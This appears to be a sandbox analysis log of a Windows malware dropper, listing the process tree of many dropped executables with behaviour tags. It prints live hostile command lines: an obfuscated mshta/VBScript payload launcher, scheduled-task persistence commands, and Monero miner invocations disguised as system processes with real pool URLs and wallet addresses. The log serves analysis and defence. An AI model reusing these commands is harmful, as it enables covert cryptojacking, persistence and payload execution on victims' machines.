C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u9⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u10⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u11⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u12⤵PID:984
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
PID:4008
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe4⤵
- Loads dropped DLL
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri192b9eeaa03b.exeFri192b9eeaa03b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\is-EUDO0.tmp\Fri192b9eeaa03b.tmp"C:\Users\Admin\AppData\Local\Temp\is-EUDO0.tmp\Fri192b9eeaa03b.tmp" /SL5="$50158,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri192b9eeaa03b.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:744 -
C:\Users\Admin\AppData\Local\Temp\is-PAHB2.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-PAHB2.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
PID:2704 -
C:\Program Files\Reference Assemblies\LZOGHATKEA\ultramediaburner.exe"C:\Program Files\Reference Assemblies\LZOGHATKEA\ultramediaburner.exe" /VERYSILENT8⤵PID:672
-
C:\Users\Admin\AppData\Local\Temp\is-13H0H.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-13H0H.tmp\ultramediaburner.tmp" /SL5="$102E8,281924,62464,C:\Program Files\Reference Assemblies\LZOGHATKEA\ultramediaburner.exe" /VERYSILENT9⤵PID:2400
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:1852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb-27388-90b-59789-ffbc6080f578d\Vehaevamaca.exe"C:\Users\Admin\AppData\Local\Temp\bb-27388-90b-59789-ffbc6080f578d\Vehaevamaca.exe"8⤵PID:2328
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3108
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:275457 /prefetch:210⤵PID:2756
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:2176007 /prefetch:210⤵PID:940
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:2176026 /prefetch:210⤵PID:3440
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:1848372 /prefetch:210⤵PID:1600
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:2176052 /prefetch:210⤵PID:1324
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:1979427 /prefetch:210⤵PID:1548
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:1848405 /prefetch:210⤵PID:8684
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:1061969 /prefetch:210⤵PID:8844
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3108 CREDAT:1324071 /prefetch:210⤵PID:8980
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:2792
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵PID:8640
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8640 CREDAT:275457 /prefetch:210⤵PID:5928
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:9028
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:3956
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3956 CREDAT:275457 /prefetch:210⤵PID:8512
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:8948
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:1920
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1920 CREDAT:275457 /prefetch:210⤵PID:1512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\05-fc78d-94a-20fa7-afc235146c1ec\Reshiqedumae.exe"C:\Users\Admin\AppData\Local\Temp\05-fc78d-94a-20fa7-afc235146c1ec\Reshiqedumae.exe"8⤵PID:1452
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 10489⤵PID:3236
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri191454c4b4.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri191454c4b4.exeFri191454c4b4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:824 -
C:\ProgramData\8281287.exe"C:\ProgramData\8281287.exe"6⤵PID:2024
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2024 -s 17447⤵
- Program crash
PID:3664
-
-
-
C:\ProgramData\6124151.exe"C:\ProgramData\6124151.exe"6⤵PID:2336
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2640
-
-
-
C:\ProgramData\7252722.exe"C:\ProgramData\7252722.exe"6⤵PID:2720
-
C:\ProgramData\7252722.exe"C:\ProgramData\7252722.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
C:\ProgramData\7252722.exe"C:\ProgramData\7252722.exe"7⤵PID:2900
-
-
C:\ProgramData\7252722.exe"C:\ProgramData\7252722.exe"7⤵PID:2332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 7287⤵
- Program crash
PID:2036
-
-
-
C:\ProgramData\7269158.exe"C:\ProgramData\7269158.exe"6⤵PID:2396
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLOSE (CrEATEoBJeCT("wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\ProgramData\7269158.exe"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if """"== """" for %D in ( ""C:\ProgramData\7269158.exe"" ) do taskkill /Im ""%~NxD"" /f ", 0 ,TRuE) )7⤵PID:2884
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\ProgramData\7269158.exe" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7&if ""== "" for %D in ( "C:\ProgramData\7269158.exe" ) do taskkill /Im "%~NxD" /f8⤵PID:2660
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "7269158.exe" /f9⤵
- Kills process with taskkill
PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\uIA5.eXEUiA5.eXe /P0NTOdcYDlh~kX43m79⤵PID:1008
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLOSE (CrEATEoBJeCT("wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if ""/P0NTOdcYDlh~kX43m7""== """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" ) do taskkill /Im ""%~NxD"" /f ", 0 ,TRuE) )10⤵PID:2992
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7&if "/P0NTOdcYDlh~kX43m7"== "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" ) do taskkill /Im "%~NxD" /f11⤵PID:3272
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" MVqJ65P._,hfmnID10⤵PID:3356
-
-
-
-
-
-
C:\ProgramData\1994565.exe"C:\ProgramData\1994565.exe"6⤵PID:3020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 17807⤵
- Program crash
PID:2040
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe4⤵
- Loads dropped DLL
PID:540 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri195cd4dbfdf37897.exeFri195cd4dbfdf37897.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\is-CF1VC.tmp\Fri195cd4dbfdf37897.tmp"C:\Users\Admin\AppData\Local\Temp\is-CF1VC.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$50160,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri195cd4dbfdf37897.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\is-PAHB1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PAHB1.tmp\Setup.exe" /Verysilent7⤵
- Executes dropped EXE
PID:1604 -
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\is-A4L1A.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-A4L1A.tmp\stats.tmp" /SL5="$20106,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\is-PI7DE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PI7DE.tmp\Setup.exe" /Verysilent10⤵PID:8480
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit11⤵PID:9056
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'12⤵
- Creates scheduled task(s)
PID:9180
-
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"11⤵PID:8692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit12⤵PID:8896
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'13⤵
- Creates scheduled task(s)
PID:3836
-
-
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth12⤵PID:8576
-
-
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵PID:3716
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵PID:2224
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exeC:\Users\Admin\AppData\Local\Temp\Mortician.exe10⤵PID:3488
-
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exeC:\Users\Admin\AppData\Local\Temp\Mortician.exe10⤵PID:3024
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws19⤵PID:3972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit10⤵PID:3796
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "foradvertising.exe" /f11⤵
- Kills process with taskkill
PID:3076
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"9⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a10⤵PID:3756
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵PID:3780
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631094602 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"9⤵PID:2168
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192902b3c24.exe4⤵
- Loads dropped DLL
PID:832 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri192902b3c24.exeFri192902b3c24.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1592 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 10406⤵
- Program crash
PID:1720
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19d30056588.exe4⤵
- Loads dropped DLL
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri19d30056588.exeFri19d30056588.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1096
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2008
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone4⤵
- Loads dropped DLL
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri19b9b73e83c948b1d.exeFri19b9b73e83c948b1d.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri19b9b73e83c948b1d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri19b9b73e83c948b1d.exe" & exit6⤵PID:2120
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fri19b9b73e83c948b1d.exe" /f7⤵
- Kills process with taskkill
PID:2700
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe4⤵
- Loads dropped DLL
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri1921f7a9d3.exeFri1921f7a9d3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe4⤵
- Loads dropped DLL
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri192f077acf656dd.exeFri192f077acf656dd.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1620 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵PID:2420
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵PID:1772
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
PID:2928
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵PID:1096
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3460
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3516
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:3504
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵PID:2952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2500 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2500 -s 14887⤵
- Program crash
PID:892
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" -a8⤵PID:2844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵PID:2584
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2836
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" -a8⤵PID:944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2188
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" -a8⤵PID:2968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2656 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2524
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" -a8⤵PID:2344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2388
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" -a8⤵PID:1044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe4⤵PID:292
-
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri19ca03f05489b.exeFri19ca03f05489b.exe5⤵PID:3496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe4⤵
- Loads dropped DLL
PID:788 -
C:\Users\Admin\AppData\Local\Temp\7zS496AFA34\Fri19927b4fe38a9d1.exeFri19927b4fe38a9d1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe4⤵PID:1700
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2668 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1084
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵PID:2724
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2724 CREDAT:275457 /prefetch:22⤵PID:1128
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2088 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2380
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3076 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3096
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3116 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3124
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3140 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3156
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:3176
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3164
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:3844 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:3996
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2804
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2920
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B696A44D1586170E711C2EDB18A7B7DC C2⤵PID:1940
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 91D932818ED9DC51841BFCC28CC0D0DF2⤵
- Executes dropped EXE
PID:2420 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3832
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 89967EF85EF1E10AF44E53E9DF275C50 M Global\MSI00002⤵PID:2904
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2284
-
C:\Windows\system32\taskeng.exetaskeng.exe {8ED49F8B-B2D9-494D-A958-3939E7AFE36B} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:792
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:3028
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:3856
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:3596
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:3448
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:2980
-
-
